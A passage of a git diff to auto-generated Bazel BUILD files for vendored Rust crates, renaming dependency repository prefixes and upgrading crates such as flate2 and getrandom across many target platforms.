"@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - 
"@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel index 6a1e3a3263b1..348b7df02744 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel @@ -85,9 +85,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.35", + version = "1.1.0", deps = [ - "@vendor__crc32fast-1.4.2//:crc32fast", - "@vendor__miniz_oxide-0.8.2//:miniz_oxide", + "@vendor_ts__crc32fast-1.4.2//:crc32fast", + "@vendor_ts__miniz_oxide-0.8.5//:miniz_oxide", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel index 680fded6c546..59751efc4aa0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "2.11.0", deps = [ - "@vendor__fs-err-2.11.0//:build_script_build", + "@vendor_ts__fs-err-2.11.0//:build_script_build", ], ) 
@@ -134,7 +134,7 @@ cargo_build_script( version = "2.11.0", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel index 5b280ccfeb80..fa1103d4e4ab 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "4.1.0", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel index e358007c5fd3..d0d00bc09926 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.4.7", deps = [ - "@vendor__fst-0.4.7//:build_script_build", + "@vendor_ts__fst-0.4.7//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel deleted file mode 100644 index 83de162212b9..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel +++ /dev/null 
@@ -1,166 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "getrandom", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "std", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=getrandom", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.2.15", - deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - 
"@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - 
"@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel new file mode 100644 index 000000000000..ae0fc92ddc7c --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel 
@@ -0,0 +1,226 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "getrandom", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "std", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=getrandom", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], 
+ "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.3.1", + deps = [ + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__getrandom-0.3.1//:build_script_build", + ] + select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = "tvos")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = 
"tvos")) + ], + "@rules_rust//rust/platform:aarch64-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "haiku", target_os = "redox", target_os = "nto", target_os = "aix")) + ], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:armv7-linux-androideabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:i686-apple-darwin": [ + 
"@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:i686-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:i686-unknown-freebsd": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "dragonfly", target_os = "freebsd", target_os = "hurd", target_os = "illumos", all(target_os = "horizon", target_arch = "arm"))) + ], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-apple-darwin": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:x86_64-apple-ios": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = "tvos")) + ], + 
"@rules_rust//rust/platform:x86_64-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "dragonfly", target_os = "freebsd", target_os = "hurd", target_os = "illumos", all(target_os = "horizon", target_arch = "arm"))) + ], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "//conditions:default": [], + }), +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "std", + ], + crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + pkg_name = "getrandom", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=getrandom", + "manual", + "noclippy", + 
"norustfmt", + ], + version = "0.3.1", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel index f0c754989697..c7341c6d1f1b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel @@ -85,10 +85,10 @@ rust_library( }), version = "0.4.15", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__bstr-1.11.3//:bstr", - "@vendor__log-0.4.22//:log", - "@vendor__regex-automata-0.4.9//:regex_automata", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__bstr-1.11.3//:bstr", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__regex-automata-0.4.9//:regex_automata", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel index 5d955b693c3c..3908ba2dea47 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel 
@@ -82,13 +82,13 @@ rust_library( version = "0.5.11", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel index 006e1ef22bab..98fd2110ebbe 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel 
@@ -85,47 +85,47 @@ rust_library( version = "0.1.61", deps = select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], 
"@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__js-sys-0.3.76//:js_sys", # cfg(all(target_arch = "wasm32", target_os = "unknown")) - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", # cfg(all(target_arch = "wasm32", target_os = "unknown")) + "@vendor_ts__js-sys-0.3.76//:js_sys", # cfg(all(target_arch = "wasm32", target_os = "unknown")) + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", # cfg(all(target_arch = "wasm32", target_os = "unknown")) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], 
"//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel index 97beb36734fd..c07a773cbeaf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.1.2", deps = [ - "@vendor__iana-time-zone-haiku-0.1.2//:build_script_build", + "@vendor_ts__iana-time-zone-haiku-0.1.2//:build_script_build", ], ) @@ -134,7 +134,7 @@ cargo_build_script( version = "0.1.2", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel index 5947f8c959bf..f5728f60e0e1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "1.9.3", deps = [ - "@vendor__hashbrown-0.12.3//:hashbrown", - "@vendor__indexmap-1.9.3//:build_script_build", + "@vendor_ts__hashbrown-0.12.3//:hashbrown", + "@vendor_ts__indexmap-1.9.3//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "1.9.3", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel index c4caf3ebfa46..de2ed0d53275 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel 
